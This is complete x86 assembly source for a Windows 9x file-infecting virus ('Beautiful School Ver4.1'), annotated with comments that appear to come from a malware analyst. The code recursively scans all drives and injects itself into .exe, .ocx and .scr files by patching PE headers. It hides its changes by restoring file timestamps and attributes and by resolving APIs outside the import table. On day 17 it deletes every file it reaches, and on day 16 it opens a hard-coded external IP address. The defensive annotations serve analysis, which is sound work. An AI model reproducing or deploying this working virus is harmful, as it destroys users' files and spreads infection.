

.586p 
.model flat,STDCALL 
include Win32v.inc 
extrn ExitProcess: proc 
; ---------------------------------------------------------------------------
; Analyst notes: fixed addresses and API indices this sample depends on.
; KnlImageBase is dereferenced as the KERNEL32 image base by @@Begin and
; @@Knl32Api (0BFF70000h is presumably the fixed Windows 9x load address --
; confirm against the system under analysis).
; AppImageBase, CodeImageBase, DataImageBase, MessageBox and FileHeaderSize
; are not referenced anywhere in the visible code.
; ---------------------------------------------------------------------------
KnlImageBase     =0bff70000h 
AppImageBase     =000400000h 
CodeImageBase    =000401000h 
DataImageBase    =000402000h 
MessageBox       =0bff541bah 
FileHeaderSize   =1000h 
; Length in bytes of the self-copying body, measured between the @@Begin and
; @@End labels (OFF is presumably an alias for "offset" from Win32v.inc).
VirusSize        =OFF @@End-OFF @@Begin 
; The same value doubles as the marker written to and compared against DR0.
VirusFlag        =VirusSize 
; Each @Name below is passed to @@Knl32Api, which uses it as a zero-based
; index into KERNEL32's export address list (address = base + list[4*index]).
; The values are positional, so they presumably match one specific KERNEL32
; build only -- TODO confirm the radix/values against the include file.
; @FindClose is defined but never used in the visible code.
@ExitProcess     equ 0247 
@GetCommandLine  equ 0328 
@WinExec         equ 0811 
@GetSystemTime   equ 0453 
@GetDriveType    equ 0359 
@SetCurrentDir   equ 0704 
@FindFirstFile   equ 0283 
@FindNextFile    equ 0288 
@FindClose       equ 0279 
@SetFileAttrib   equ 0716 
@SetFileTime     equ 0719 
@GetFileSize     equ 0374 
@DeleteFile      equ 0215 
@LOpen           equ 0843 
@CreateFileMap   equ 0185 
@MapViewOfFile   equ 0584 
@UnmapViewOfFile equ 0787 
@CloseHandle     equ 0159  
; The whole body (@@Begin..@@End) is assembled into the data segment; the
; .code segment at the end of the file only jumps here.
.data 
; ---------------------------------------------------------------------------
; @@Begin -- entry point of the copied body.
; Performs three environment checks and, if any of the first two fails or the
; DR0 marker is already set, hands control to the saved original entry point.
; Clobbers: eax.
; Analyst notes: the checks tie execution to a KERNEL32 mapped at KnlImageBase;
; DR0 == VirusFlag is used as an "already ran" marker.
; ---------------------------------------------------------------------------
@@Begin:     
    mov   eax,[esp]                 ; dword on top of the stack at entry (presumably the return address into the loader)
    and   eax,0bff00000h 
    cmp   eax,0bff00000h            ; all of these address bits must be set in that value
    jnz   short @@JmpOldApp     
    mov   eax,ds:[KnlImageBase]     ; first dword at the assumed KERNEL32 base
    not   eax 
    cmp   ax,not('ZM');             ; low word must be the DOS "MZ" signature (compared in inverted form)
    jnz   short @@JmpOldApp     
    mov   eax,dr0                   ; privileged debug-register read (assembled thanks to .586p)
    cmp   eax,VirusFlag     
    jnz   short @@SetFlag           ; marker absent -> take the first-run path
; Hand-encoded "mov eax, imm32" (opcode 0B8h) followed by "jmp eax".
; The imm32 is the OldEntryRVA dword: it defaults to @@Quit in this build and
; is overwritten in each copy by @@MoveVirusToFileMap with the value the host
; file's entry point had before modification (entry RVA + image base).
@@JmpOldApp:     
    db    0b8h 
    OldEntryRVA  dd OFF @@Quit 
    jmp   eax 
; ---------------------------------------------------------------------------
; @@SetFlag -- first-run path, reached when DR0 does not hold VirusFlag.
; Sets the marker, starts the current command line a second time, then walks
; 24 drive roots and runs the directory traversal on each usable one.
; Falls through into @@Quit when the loop ends.
; Analyst notes: observable behaviour is a child process with the same command
; line followed by a recursive file walk of every non-CD-ROM drive C: to Z:.
; ---------------------------------------------------------------------------
@@SetFlag: 
    mov   eax,VirusFlag 
    mov   dr0,eax                               ; write the marker tested in @@Begin
    call  @@Knl32Api,@GetCommandLine            ; eax = command line of this process
    call  @@Knl32Api,@WinExec,eax,L 0           ; run that command line again, show-window argument 0
                                                ; presumably the relaunched instance takes the @@JmpOldApp path -- TODO confirm
    mov   ecx,24                                ; loop counter: 24 drive letters
    mov   edx,005c3a43h                         ; bytes 43 3A 5C 00 = "C:\",0
@@ContKillNextDrive:   
    push  ecx                                   ; preserved: @@Knl32Api overwrites ecx
    push  edx                                   ; the pushed dword is the root-path string, esp points at it
    call  @@Knl32Api,@GetDriveType,esp 
    cmp   eax,05h ;IS CDROM ? 
    jz    short @@KillNextDrive 
    cmp   eax,01h ;Is no exist drive ? 
    jz    short @@KillNextDrive   
    mov   ebx,esp                               ; ebx = pointer to the root path for @@FindFirstFile
    call  @@FindFirstFile   
@@KillNextDrive: 
    pop   edx   
    inc   edx                                   ; low byte is the drive letter: advance to the next one
    pop   ecx 
    loop  @@ContKillNextDrive  
; ---------------------------------------------------------------------------
; @@Quit -- date-triggered action followed by process exit.
; When the day of month returned by @@GetSystemTime is 16, the HttpName string
; is passed to WinExec; in every case the process then calls ExitProcess(0).
; Analyst notes: the trigger (day == 16) and the command line stored in
; HttpName are usable as behavioural and static indicators.
; ---------------------------------------------------------------------------
@@Quit: 
    call  @@GetSystemTime                       ; eax = day of month, ecx = year
    cmp   eax,16 
    jnz   short @Exit 
    call  @@GetHttpName                         ; call/pop pair: obtains the run-time address of @@GetHttpName
@@GetHttpName: 
    pop   eax 
    add   eax,OFF HttpName-OFF @@GetHttpName    ; eax = run-time address of HttpName, independent of load address
    call  @@Knl32Api,@WinExec,eax,L 0     
@Exit:     
    call  @@Knl32Api,@ExitProcess,L 0     
; ---------------------------------------------------------------------------
; @@FindFirstFile -- recursive directory traversal.
; In:    ebx = pointer to a NUL-terminated directory path
; Stack: one dword holding the "*.*" pattern plus a WIN32_FIND_DATAA buffer
; Makes ebx the current directory, enumerates "*.*", calls @@FindExtName for
; each non-directory entry and recurses into each directory whose name does
; not start with '.'.
; Notes from the visible code: the entry filled in by the initial
; FindFirstFile call is not examined before FindNextFile is called, the
; returned handle is not compared against a failure value, and no FindClose
; call appears in this routine.
; ---------------------------------------------------------------------------
@@FindFirstFile: 
    call  @@Knl32Api,@SetCurrentDir,ebx     
    mov   eax,002a2e2ah                         ; bytes 2A 2E 2A 00 = "*.*",0
    push  eax 
    mov   eax,esp                               ; eax = pointer to the pattern string
    sub   esp,size WIN32_FIND_DATAA             ; esp = find-data buffer
    call  @@Knl32Api,@FindFirstFile,eax,esp 
    mov   esi,eax                               ; esi = search handle
@@ContFindNextFile:   
    call  @@Knl32Api,@FindNextFile,esi,esp 
    cmp   eax,0 
    jnz   short @@FindFileOrDir 
    add   esp,size WIN32_FIND_DATAA             ; enumeration finished: release the buffer
    pop   eax                                   ; and the pattern dword
    ret 
@@FindFileOrDir:   
    mov   eax,[esp.fdFileAttributes] 
    and   eax,10h                               ; 10h = directory attribute bit
    jnz   short @@IsDir 
@@IsFile: 
    mov   ebp,esp                               ; ebp = find-data pointer expected by @@FindExtName
    push  esi   
    call  @@FindExtName 
    pop   esi 
    jmp   short @@ContFindNextFile 
@@IsDir:   
    lea   ebx,[esp.fdFileName] 
    cmp   B [ebx],'.'                           ; skips any name beginning with '.', which covers "." and ".."
    jz    short @@IsDotDir 
    push  esi 
    call  @@FindFirstFile                       ; recurse with ebx = sub-directory name
    pop   esi 
    mov   eax,00002e2eh                         ; bytes 2E 2E 00 00 = "..",0
    push  eax 
    call  @@Knl32Api,@SetCurrentDir,esp         ; return to the parent directory
    pop   eax 
@@IsDotDir:     
    jmp   short @@ContFindNextFile     
; ---------------------------------------------------------------------------
; @@FindExtName -- per-file decision: delete, modify, or ignore.
; In:    ebp = pointer to the WIN32_FIND_DATAA of the current file
; If the year is 2002 or later and the day of month is 17, the file is passed
; to DeleteFile and nothing else is done with it. Otherwise the last four
; characters of the name are lower-cased and matched against ".exe", ".ocx"
; and ".scr"; a match continues at @@IsExeFile, anything else returns.
; Analyst notes: the day-17 branch is a destructive payload applied to every
; file the traversal reaches, regardless of extension.
; ---------------------------------------------------------------------------
@@FindExtName: 
    call  @@GetSystemTime                       ; eax = day of month, ecx = year
    cmp   ecx,2002    
    jb    short @@NoDelFile 
    cmp   eax,17 
    jnz   short @@NoDelFile 
    lea   eax,[ebp.fdFileName] 
    call  @@Knl32Api,@DeleteFile,eax 
    ret 
@@NoDelFile:       
    lea   eax,[ebp.fdFileName] 
@@ContFindExtName: 
    inc   eax                                   ; scan forward to the terminating NUL
    cmp   B [eax],0 
    jnz   short @@ContFindExtName 
    mov   eax,[eax-4]                           ; the four bytes immediately before the NUL
    or    eax,20202020h                         ; force bit 5 in each byte (ASCII letters become lower case)
    not   eax                                   ; compared in inverted form against inverted constants
    cmp   eax,not ('exe.')                      ; character constants are written reversed: matches ".exe" in memory
    jz    short @@IsExeFile 
    cmp   eax,not ('xco.')                      ; ".ocx"
    jz    short @@IsExeFile    
    cmp   eax,not ('rcs.')                      ; ".scr"
    jz    short @@IsExeFile         
    ret   
; ---------------------------------------------------------------------------
; @@IsExeFile -- open, map and validate a candidate file, then call
; @@FixPeFile; reached by a jump from @@FindExtName and returns to its caller.
; In:    ebp = pointer to the WIN32_FIND_DATAA of the file
; Stack discipline: FindFileData, hFile, hFileMap and lpFileMap are pushed in
; that order and popped by the matching cleanup labels.
; DR1 is used as scratch storage for the file/mapping size.
; Analyst notes: the routine clears the file attributes before opening, and
; afterwards writes back the three timestamps and the attribute value taken
; from the find data. Timestamps and attributes of a modified file therefore
; look unchanged; content hashes and PE header fields are the reliable
; comparison points.
; ---------------------------------------------------------------------------
@@IsExeFile:  
;//////////////Fix PE File///////////// 
    push  ebp     ;/////Push  FindFileData    
    lea   esi,[ebp.fdFileName] 
    call  @@Knl32Api,@SetFileAttrib,esi,L 0     ; attributes set to 0 so the open below is not blocked
    lea   esi,[ebp.fdFileName] 
    call  @@Knl32Api,@LOpen,esi,L 02            ; open mode 2 (read/write)
    cmp   eax,-1h 
    jz    @@OopsFileAttrib 
    mov   ebp,eax 
    push  ebp     ;/////Push hFile 
    call  @@Knl32Api,@GetFileSize,ebp,L 0     
    cmp   eax,size PEFileHeader+VirusSize+100h  ; files smaller than this threshold are left alone
    jb    short @@CloseFile 
    mov   dr1,eax ;//Save MapSize to dr1  
    call  @@Knl32Api,@CreateFileMap,ebp,L 0,PAGE_READ+PAGE_WRITE,L 0,eax,L 0  ; mapping size = current file size
    cmp   eax,-1h 
    jz    short @@CloseFile 
    mov   ebp,eax 
    push  ebp     ;/////Push hFileMap 
    call  @@Knl32Api,@MapViewOfFile,ebp,FILE_MAP_READ+FILE_MAP_WRITE,L 0,L 0,L 0 
    cmp   eax,0h 
    jz    short @@CloseFileMap 
    mov   ebp,eax                               ; ebp = base of the mapped view from here on
    push  ebp     ;/////Push lpFileMap 
    mov   ax,[ebp] 
    not   ax     
    cmp   ax,not('ZM')                          ; file must start with the DOS "MZ" signature
    jnz   short @@FlushFileMap      
    movzx eax,W [ebp.PEHeaderOffset]            ; PE header offset, read as a 16-bit value
    mov   ecx,dr1 ;//Get MapSize 
    cmp   eax,ecx 
    ja    short @@FlushFileMap                  ; offset beyond the mapped size: not processed
    lea   esi,[eax+ebp] ;//GetPeFileHeader             
    mov   ax,[esi] 
    not   ax     
    cmp   ax,not('EP')                          ; low word of the PE signature must be "PE"
    jnz   short @@FlushFileMap  
    call  @@FixPeFile                           ; esi = PE header, ebp = view base
@@FlushFileMap:     
    pop   ebp  ;/////Pop lpFileMap 
    call  @@Knl32Api,@UnmapViewOfFile,ebp     
@@CloseFileMap:     
    pop   ebp  ;/////Pop hFileMap     
    call  @@Knl32Api,@CloseHandle,ebp                 
@@CloseFile: 
    pop   ebp  ;/////Pop hFile 
    pop   esi   
    push  esi  ;//esi=FindFileData (peeked, left on the stack)
    lea   eax,[esi.fdCreationTime] 
    lea   ebx,[esi.fdLastAccessTime] 
    lea   ecx,[esi.fdLastWriteTime]     
    call  @@Knl32Api,@SetFileTime,ebp,eax,ebx,ecx   ; write back the timestamps recorded before the file was touched
    call  @@Knl32Api,@CloseHandle,ebp 
@@OopsFileAttrib: 
    pop   ebp  ;/////POP FindFileData 
    lea   esi,[ebp.fdFileName] 
    call  @@Knl32Api,@SetFileAttrib,esi,D [ebp.fdFileAttributes]   ; write back the attribute value from the find data
    ret     
;/////////////////////////////////////////////////     
; ---------------------------------------------------------------------------
; @@FixPeFile -- first placement attempt: unused space after the PE headers.
; In:    esi = PE header inside the mapped view, ebp = view base,
;        DR1 = mapped size
; Computes min(otPhysOffset, otRVA) of the first object-table entry minus
; fhHeaderSize. If at least VirusSize bytes are free and the destination lies
; inside the mapping, the body is copied to file offset fhHeaderSize,
; fhHeaderSize grows by VirusSize and fhEntryRVA is set to the old
; fhHeaderSize. Otherwise control goes to @@FindObjectSpace.
; Analyst notes: the file length is not changed on this path; the visible
; artefacts are an entry point that lies inside the header area and an
; enlarged header-size field.
; ---------------------------------------------------------------------------
@@FixPeFile:     
    lea   edi,[esi.fhObjectTable0] 
    ;//esi=PeHeaderAddress  
    ;//edi=ObjectTableAddress    
@@FindHeaderSpace:    
    mov   eax,[edi.otPhysOffset] 
    mov   ebx,[edi.otRVA] 
    cmp   eax,ebx 
    jb    short @@Cont00     
    mov   eax,ebx ;//Get All Space: eax = the smaller of the two values
@@Cont00:        
    mov   ebx,[esi.fhHeaderSize];// Get Used Space 
    sub   eax,ebx   ;//Get UnUsed Space 
    jb    short @@FindObjectSpace               ; borrow: no free header space
    cmp   eax,VirusSize 
    jb    short @@FindObjectSpace     
    mov   edx,dr1 ;//Get MapSize 
    sub   edx,VirusSize 
    jb    short @@UnknowError0 
    cmp   edx,ebx                               ; destination offset must be <= mapped size - VirusSize
    jb    short @@UnknowError0 
    mov   eax,[esi.fhEntryRVA] 
    add   eax,[esi.fhImageBase];//Get OldAppEnry: entry RVA + image base
    call  @@MoveVirusToFileMap ;//Setup OldEnry And Move Virus (eax = old entry, ebx = destination offset)
    add   [esi.fhHeaderSize],VirusSize 
    mov   [esi.fhEntryRVA],ebx                  ; new entry point = offset the body was copied to
@@UnknowError0:     
    ret 
; ---------------------------------------------------------------------------
; @@FindObjectSpace -- second placement attempt: slack at the end of a section.
; In:    esi = PE header, edi = first object-table entry, ebp = view base,
;        DR1 = mapped size
; Iterates fhObjectCount-1 times over adjacent entry pairs. For each entry the
; available span is min(next.otPhysOffset - otPhysOffset, next.otRVA - otRVA)
; and the used span is min(otVirtSize, otPhysSize). When the difference is at
; least VirusSize and the destination lies inside the mapping, the body is
; copied directly after the used span, fhEntryRVA is pointed at it, the two
; size fields are raised where necessary and the flags are OR-ed with
; 060000020h.
; Analyst notes: the file length is not changed on this path; the visible
; artefacts are an entry point near the end of a section's data, adjusted
; otPhysSize/otVirtSize values and the added flag bits.
; ---------------------------------------------------------------------------
@@FindObjectSpace: 
    movzx ecx,[esi.fhObjectCount] 
    dec   ecx                                   ; pairs of adjacent entries = count - 1
@@ContFindObjectSpace:     
    push  ecx  ;//Push loop ecx 
    mov   eax,[edi.otPhysOffset+size ObjectTable] 
    sub   eax,[edi.otPhysOffset] ;//Get PhysSpace 
    mov   ebx,[edi.otRVA+size ObjectTable] 
    sub   ebx,[edi.otRVA]        ;//Get RVA Space 
    cmp   eax,ebx 
    jb    short @@Cont10 
    mov   eax,ebx   ;//Get All Space: eax = the smaller span
@@Cont10: 
    mov   ebx,[edi.otVirtSize] 
    mov   ecx,[edi.otPhysSize] 
    cmp   ebx,ecx 
    jb    short @@Cont11 
    mov   ebx,ecx   ;//Get Used Space: ebx = the smaller size
@@Cont11: 
    sub   eax,ebx   ;//Get UnUsed Space         
    jb    short @@MayBeNoSpace              
    cmp   eax,VirusSize 
    jb    short @@MayBeNoSpace 
    mov   ecx,ebx                               ; ecx = used span, kept for the RVA calculation below
    add   ebx,[edi.otPhysOffset]                ; ebx = file offset just past the used data
    mov   edx,dr1  ;//Get MapSize 
    sub   edx,VirusSize 
    jb    short @@UnknowError1 
    cmp   edx,ebx                               ; destination offset must be <= mapped size - VirusSize
    jb    short @@UnknowError1 
    mov   eax,[esi.fhEntryRVA] 
    add   eax,[esi.fhImageBase]                 ; eax = old entry: RVA + image base
    call  @@MoveVirusToFileMap ;//Setup OldEnry And Move Virus 
    mov   edx,ecx 
    add   ecx,[edi.otRVA] 
    mov   [esi.fhEntryRVA],ecx                  ; new entry point = section RVA + used span
    add   edx,VirusSize ;//Get New Used Space 
    cmp   edx,[edi.otPhysSize] 
    jb    short @@Cont12 
    mov   [edi.otPhysSize],edx ;//Raise otPhysSize to cover the copied body
@@Cont12:     
    cmp   edx,[edi.otVirtSize] 
    jb    short @@Cont13 
    mov   [edi.otVirtSize],edx ;//Raise otVirtSize to cover the copied body
@@Cont13:     
    or    [edi.otFlags],060000020h ;//sets bits 40000000h, 20000000h and 00000020h (readable, executable, contains code in PE terms)
@@UnknowError1:     
    pop   ecx ;//Pop loop ecx 
    ret 
@@MayBeNoSpace: 
    pop   ecx 
    add   edi,size ObjectTable                  ; advance to the next object-table entry
    loop  @@ContFindObjectSpace 
    ret    
; ---------------------------------------------------------------------------
; @@MoveVirusToFileMap -- copy the running body into the mapped file.
; In:    eax = value to store in the copy's OldEntryRVA slot (both callers
;              pass the host's old entry RVA + image base)
;        ebx = destination offset inside the mapping
;        ebp = base of the mapped view
; Out:   all general registers preserved (pushad/popad)
; Copies VirusSize bytes starting at the run-time address of @@Begin, then
; patches the imm32 of the hand-encoded "mov eax, imm32" in the copy so that
; @@JmpOldApp in the modified file jumps to the host's former entry point.
; Analyst notes: the copy includes the HttpName and VirusName strings, which
; therefore appear verbatim in every modified file.
; ---------------------------------------------------------------------------
@@MoveVirusToFileMap:;//eax=old entry value to store,ebx=Move to Map offset Address 
    pushad 
    call  @@GetBase                             ; call/pop pair: obtains the run-time address of @@GetBase
@@GetBase: 
    pop   esi 
    sub   esi,OFF @@GetBase-OFF @@Begin         ; esi = run-time address of @@Begin
    mov   edi,ebx 
    add   edi,ebp                               ; edi = view base + destination offset
    push  edi 
    mov   ecx,VirusSize 
    cld 
    rep   movsb 
    pop   edi                                   ; edi = start of the copy again
    mov   [edi+OFF OldEntryRVA-@@Begin],eax     ; eax still holds the caller's value (pushad does not alter it)
    popad 
    ret  
;//////////////////////////////////////////         
; ---------------------------------------------------------------------------
; @@Knl32Api -- call a KERNEL32 export by index, without an import-table entry.
; In:    [esp]   = return address of the caller
;        [esp+4] = export index (one of the @Name equates)
;        [esp+8...] = arguments for the API itself
; Walks the PE header at KnlImageBase to the export directory and its export
; address list, reads entry [index] and adds the base to get the API address.
; The stack is then rewritten so that "ret" transfers to the API with the
; caller's return address in the slot that held the index; the API returns
; straight to the original caller.
; Clobbers: eax, ebx, ecx (before the API runs).
; Analyst notes: the APIs used by this code do not show up in the import table
; of a modified file, so import inspection alone will not reveal them.
; ---------------------------------------------------------------------------
@@Knl32Api: 
    mov   eax,KnlImageBase 
    movzx ebx,word ptr[eax+PEHeaderOffset]      ; PE header offset, read as a 16-bit value
    add   ebx,eax 
    mov   ebx,[ebx.fhExportsRVA] 
    add   ebx,eax                               ; ebx = export directory
    mov   ebx,[ebx.etExportAddrList] 
    add   ebx,eax                               ; ebx = export address list
    mov   ecx,[esp+4]                           ; ecx = requested index
    lea   ebx,[ebx+4*ecx] 
    add   eax,[ebx]                             ; eax = base + list[index] = API address
    xchg  eax,[esp]                             ; [esp] = API address, eax = caller's return address
    mov   [esp+4],eax                           ; return address replaces the index slot
    ret                                         ; "returns" into the API
; ---------------------------------------------------------------------------
; @@GetSystemTime -- fetch the current date for the two date triggers.
; Out:   eax = stDay (day of month), ecx = stYear
; Uses a SystemTime structure allocated on the stack and released before
; returning. The value comes from the GetSystemTime export; whether that is
; UTC or local time on the target system should be confirmed when
; reproducing the day-16 and day-17 triggers.
; ---------------------------------------------------------------------------
@@GetSystemTime: 
    sub   esp,size SystemTime 
    call  @@Knl32Api,@GetSystemTime,esp 
    movzx eax,[esp.stDay]        
    movzx ecx,[esp.stYear] 
    add   esp,size SystemTime       
    ret                
; Embedded strings. Both lie between @@Begin and @@End, so they are part of the
; VirusSize bytes copied by @@MoveVirusToFileMap and can serve as static
; indicators when scanning files.
; HttpName is the command line handed to WinExec by @@Quit on day 16.
HttpName  db 'Explorer Http://202.115.114.30',0 
; VirusName is not referenced by any instruction in the visible code.
VirusName db 'Beautiful School Ver4.1',0              
; End marker used to compute VirusSize.
@@End:     
; Program entry of this build: the code segment holds a single jump into the
; body stored in the data segment. Copies placed in other files start directly
; at @@Begin via the rewritten entry-point field and do not include this stub.
.code 
@@Start: 
    jmp   @@Begin     
ends 
end @@Start